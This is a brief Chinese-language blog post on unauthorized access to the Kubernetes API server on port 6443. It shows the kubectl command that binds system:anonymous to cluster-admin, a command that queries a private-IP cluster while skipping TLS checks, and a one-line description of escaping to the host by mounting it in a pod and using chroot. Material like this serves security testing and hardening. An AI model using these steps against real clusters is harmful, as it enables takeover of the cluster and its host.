K8S 6443未授权访问

  1. 攻击思路

如果不小心,将”system:anonymous”用户绑定到”cluster-admin”用户组,从而使6443 端口允许匿名用户以管理员权限向集群内部下发指令

使用以下命令将anonymous用户绑定到cluster-admin用户组

1
kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous

攻击思路

使用以下命令认证,其他方式和8080端口未授权的一样,创建pod挂载,然后chroot到宿主机

1
./kubectl --insecure-skip-tls-verify  -s https://192.168.116.132:6443 get pods


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:K8S 6443未授权访问

本文作者:sher10ck

发布时间:2023-02-15, 15:04:08

最后更新:2023-02-15, 15:56:30

原始链接:http://sherlocz.github.io/2023/02/15/K8S-6443未授权访问/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录